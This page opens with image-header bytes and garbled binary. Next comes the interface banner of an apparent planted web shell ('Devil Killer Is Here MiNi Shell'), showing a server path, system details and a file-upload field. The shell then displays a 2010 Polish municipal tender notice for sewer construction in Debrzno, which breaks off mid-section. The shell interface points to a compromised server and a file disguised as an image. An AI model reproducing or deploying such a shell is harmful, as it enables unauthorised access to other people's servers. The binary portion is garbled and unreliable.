JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100609/161238-N-2010.html

<p class="kh_header"><b>Debrzno: Budowa ciśnieniowej kanalizacji sanitarnej dla wsi Słupia i Myśligoszcz, etap III i IV do miejscowości Boboszewo i budowa kanalizacji sanitarnej w m. Buchowo z przewodem tłocznym do miejscowości Debrzno</b><br>
<b>Numer ogłoszenia: 161238 - 2010; data zamieszczenia: 09.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Debrznie , ul. Traugutta 2, 77-310 Debrzno, woj. pomorskie, tel. 059 8335366, faks 059 8335351.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.debrzno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ciśnieniowej kanalizacji sanitarnej dla wsi Słupia i Myśligoszcz, etap III i IV do miejscowości Boboszewo i budowa kanalizacji sanitarnej w m. Buchowo z przewodem tłocznym do miejscowości Debrzno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Budowa ciśnieniowej kanalizacji sanitarnej dla wsi Słupia
    i Myśligoszcz, etap III i IV do miejscowości Boboszewo i budowa kanalizacji sanitarnej
    w m. Buchowo z przewodem tłocznym do miejscowości Debrzno zgodnie z załączoną
   dokumentacją techniczną i pozwoleniem na budowę nr BiK 7351-322/06, BiK 7351-160/10 oraz
    BiK 7351-173/10.
2. W zakresie niniejszego zadania  wchodzą:
    ZADANIE NR - I
      Budowa ciśnieniowej kanalizacji sanitarnej dla wsi Słupia ,
 1.  W/g projektu budowlano wykonawczego pod tytułem :
      Budowa ciśnieniowej kanalizacji sanitarnej dla wsi Słupia ,Myśligoszcz , Boboszewo gm.
      Debrzno.
     dla m. Słupia :
-  kanały kanalizacji tłocznej    50PE  = 829,0 mb
      -  kanały kanalizacji tłocznej    63PE  = 520,0 mb
      -  kanały kanalizacji tłocznej    75PE  = 209,0 mb 
      -  kanały kanalizacji tłocznej    90PE  = 2.130,0 mb
      -  przyłącza kanalizacji sanitarnej grawitacyjne 160 PVC  = 118,0 mb
      -  pompownie przydomowe typ Presskan - 28 sztuk
    dla m. Myśligoszcz i Boboszewo :
-  kanały kanalizacji tłocznej    50PE  = 2.150,0 mb
      -  kanały kanalizacji tłocznej    63PE  = 1.204,0 mb
      -  kanały kanalizacji tłocznej    75PE  = 1.900,0 mb
      -  kanały kanalizacji tłocznej    110PE  = 1.788,0 mb
      -  kanalizacja sanitarna grawitacyjna 200 PVC  = 12,50 mb
      -  przyłącza kanalizacji sanitarnej grawitacyjne 160 PVC  = 212,50 mb
      -  pompownie przydomowe typ Presskan - 54 + 1 = 55 sztuk 
2. W/g projektu budowlano wykonawczego pod tytułem :
    Sieć kanalizacji sanitarnej z przepompownią ścieków i rurociąg tłoczny dla mm. Słupia gm. 
    Debrzno        
kanał grawitacyjny   200 PCV = 807,50 m
kanał grawitacyjny   150 PCV =   61,00 m
kanał kanalizacji tłocznej  90 PE =  442,0 m
kanał kanalizacji tłocznej  75 PE =    4,50 m
kanał kanalizacji tłocznej  63 PE =  18,50 m
przyłącza kanalizacji sanitarnej grawitacyjne 150 PCV L= 251,50 mb
przepompownia ścieków z polimerobetonu - dn- 1500 mm - szt. 1

ZADANIE NR - II

  Budowa kanalizacji sanitarnej z przyłączami i przepompownią ścieków w m. Buchowo
  wraz przewodem tłocznym do m. Debrzno

kanał sanitarny  fi 200 PCV L = 378,0 m (w m.Buchowo) + 11,5 m (w m.Debrzno)
przykanaliki   fi160 PCV  L = 43 m / 4 szt
kanał tłoczny fi110 PE  L = 1348,50 m
kanał tłoczny fi160 PE  L = 4074,00 m
przepompownia ścieków PS-1 z  polimerobetonu  dn- 1500 mm - szt. 1                                                    												Uwaga :    									            Wykonawca w ramach ceny ryczałtowej wykona zasilanie w energię elektryczną przepompowni zgodnie z projektami branżowymi i warunkami technicznym  administratora sieci. ENERGA Operator S.A.
												            Prace budowlane winny być realizowane w oparciu o następujące decyzje pozwolenia na budowę	:
a) BiK-7351-322/06 
b) BiK-7351-160/10 
c) BiK-7351-173/10 

Uwaga: 
Oferowane przez Wykonawcę pompownie przydomowe powinny zapewniać kompatybilność (bezpośrednią współpracę) z funkcjonującym na terenie gminy systemem kanalizacji sanitarnej ciśnieniowej opartej na urządzeniach firmy Presskan Polska. 
Pełny i szczegółowy zakres i sposób wykonania przedmiotu zamówienia został wskazany w takich dokumentach jak: projekty budowlano - wykonawcze (stanowiące załącznik do specyfikacji), specyfikacje techniczne wykonania i odbioru robót (stanowiące załącznik do specyfikacji) oraz przedmiarach robót (stanowiących załącznik do specyfikacji).
Do każdej z nazw firm, znaków firmowych, itp., które zostały wymienione w niniejszej specyfikacji, projektach budowlano - wykonawczych (stanowiących załącznik do niniejszej specyfikacji), specyfikacji technicznych wykonania i odbioru robót (stanowiące załącznik do niniejszej specyfikacji) oraz przedmiarach robót (stanowiących załącznik do niniejszej specyfikacji) - dodaje się słowa lub równoważne.
UWAGA !
1.Materiały i urządzenia przyjęte w dokumentacji projektowej dla których jest wskazany producent lub dystrybutor są podane przykładowo i określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany standard.
2.Zamawiający dopuszcza składnie ofert z użyciem materiałów i urządzeń równoważnych do określonych w dokumentacji projektowej. Warunkiem jest aby materiały i urządzenia równoważne posiadały co najmniej takie same parametry techniczno - użytkowe jak użyte w dokumentacji projektowej.
3.Wykonawca składający ofertę przy zastosowaniu materiałów i urządzeń o równoważnych parametrach jest obowiązany do zapewnienia i udokumentowania ich równoważności (dokumenty określające ich parametry jakościowe oraz wymagany standard np. karty katalogowe, aprobaty techniczne itp.).
4.Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty potwierdzające pozwolenie na ich zastosowanie (atesty, certyfikaty, deklaracje zgodności, świadectwa jakości).
Ponadto wykonawca w ramach przedmiotu zamówienia skalkuluje w cenie ofertowej i bez dodatkowego wynagrodzenia zobowiązuje się do:
1)Dokonania rozruchu technologicznego wybudowanych przepompowni ścieków  i dostarczenia zamawiającemu dokumentacji techniczno ruchowej obiektów oraz przeszkolenia w zakresie obsługi osoby wskazanej przez zamawiającego.
2)Geodezyjnej obsługi inwestycji polegającej na:
a) geodezyjnym wytyczeniu trasy kanalizacji sanitarnej wraz z obiektami na kanalizacji,
b) geodezyjnej obsłudze robót,
c) wykonaniu geodezyjnej dokumentacji powykonawczej wybudowanej kanalizacji.
3)Oznakowania i właściwego zabezpieczenia terenu budowy.
4)Ubezpieczenia prac budowlanych z tytułu odpowiedzialności za wypadki i szkody wyrządzone przy realizacji prac.
5)Ewentualnego uaktualnienia uzgodnień.
6)Wykonania na własny koszt projektu tymczasowej organizacji ruchu i zatwierdzenia go w stosownych jednostkach,
7)Wniesienia opłaty za zajęcie pasa drogowego na czas prowadzonych robót.
8)Utrzymywania nawierzchni dróg zgodnie z wymaganiami zarządcy dróg.
9)Zabezpieczenia we własnym zakresie wody i energii elektrycznej niezbędnych do wykonania robót i ponoszenia kosztów ich zużycia.
10)Wykonania niezbędnych badań prób i pomiarów w celu sprawdzenia prawidłowości wykonanych robót.
11)Utrzymania terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz usuwania na bieżąco zbędnych materiałów i odpadów.
12)Zapewnienia dostępu (dojścia i dojazdu) do posesji ich mieszkańcom i użytkownikom podczas prowadzenia robót.
13)Uporządkowania terenu budowy po zakończeniu robót.
14)Wywiezienia i utylizacji wszystkich zdemontowanych materiałów, gruzu, ziemi oraz materiałów niezbędnych do wykonania robót w miejsce przez siebie ustalone.
15)Odtworzenia nawierzchni dróg i chodników w przypadku ich zniszczenia na skutek prowadzonych robót.
16)Odtworzenia znaków geodezyjnych (kamieni granicznych) w przypadku ich naruszenia.
17)Naprawy uszkodzonych urządzeń uzbrojenia podziemnego i nadziemnego spowodowanych prowadzonymi robotami budowlanymi - w uzgodnieniu z ich użytkownikami (administratorami).
18)Naprawy ogrodzeń oraz innych uszkodzeń istniejących obiektów i elementów zagospodarowania terenu, spowodowanych prowadzonymi robotami budowlanymi.
19)Innych prac, których wykonanie będzie niezbędne dla prawidłowej realizacji i funkcjonowania przedmiotu zamówienia.
Wykonawca udzieli gwarancji na wykonane roboty na okres wskazany w ofercie, jednak nie krótszy niż 36 miesięcy, natomiast na dostarczone i zamontowane urządzenia gwarancja będzie opiewała na okres podany przez ich producenta..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające o których mowa w art. 67 ust.1 pkt. 6 ustawy Prawo Zamówień Publicznych stanowiących nie więcej niż 50% zamówienia podstawowego. Zamawiający przewiduje udzielenie zamówień uzupełniających, jeżeli od tego będzie zależało uzyskanie pełnej funkcjonalności przedmiotu zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.40-8, 45.23.21.52-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zgodnie z art. 45 ust. 2 ustawy Prawo Zamówień Publicznych zamawiający rezygnuje 
z obowiązku wnoszenia wadium przez wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegajacy się o udzielenie niniejszego zamówienia musi posiadać uprawnienia do wykonywania określonej działalności gospodarczej. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/niespełnia na podstawie załączonego do oferty oświadczenia wykonawcy potwierdzającego spełnienie tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegajacy się o udzielenie niniejszego zamówienia musi wykazać, że wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo oraz w terminie ukończył, w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie roboty budowlane,  polegające  na wykonaniu sieci kanalizacji sanitarnej z rur PE o długości nie mniejszej niż 5,0 km każda. Zamawiający uzna także za spełnienie w/w warunku wykazanie wykonania jednej roboty budowlanej, polegającej na wybudowaniu sieci kanalizacji sanitarnej z rur PE o długości nie mniejszej niż  10,0  km. Powyższe winno być potwierdzone w formie pisemnej przez inwestorów.
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/niespełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegajacy się o udzielenie niniejszego zamówienia musi posiadać potencjał techniczny do wykonania zamówienia.Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/niespełnia na podstawie załączonego do oferty oświadczenia wykonawcy potwierdzającego spełnienie tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegajacy się o udzielenie niniejszego zamówienia musi wykazać, że Dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - tzn.  wykonawca musi wykazać dysponowaniem, w celu wykonania zamówienia,  min. jedną osobą przewidywaną do pełnienia funkcji kierownika budowy z pięcioletnim doświadczeniem posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności: instalacyjnej w zakresie sieci, instalacji, wodociągowych i kanalizacyjnych oraz jedną osobą przewidywaną do pełnienia funkcji kierownika robót o specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Powyższe osoby winny należeć do odpowiedniej Okręgowej Izby Inżynierów Budownictwa.Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/niespełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegajacy się o udzielenie niniejszego zamówienia musi wykazać, że Znajduje się w sytuacji ekonomicznej i finansowej za­pewniającej wykonanie zamówienia tzn. wykonawca posiada środki lub zdolność kredytową na kwotę nie niższą niż 2 500 000 zł oraz posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 1 000 000  zł.Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/niespełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Formularz ofertowy zgodny ze wzorem stanowiącym załącznik nr 1 do SIWZ, b)Oświadczenie o sełnianiu warunków zawartych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych ( załącznik Nr- 2 do SIWZ), c) Oświadczenie o braku podstaw do wykluczenia wykonawcy na podstawie art. 24 ust. 1 ustawy  Prawo Zamówień Publicznych ( załącznik Nr- 3 do SIWZ), d) Oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 4 do SIWZ) e) Kosztorys ofertowy, f) Stosowne pełnomocnictwo ( oryginał lub kopia notarialnie potwierdzona) - w przypadku gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru, g) W przypadku ubiegających sie wspólnie o udzielenie zamówienia publicznego dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówieniapublicznego albo rteprezentowania w postępowaniu  i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Istotna zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.
2.Zamawiający przewidział wprowadzenie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty złożonej przez Wykonawcę, w następujących okolicznościach:
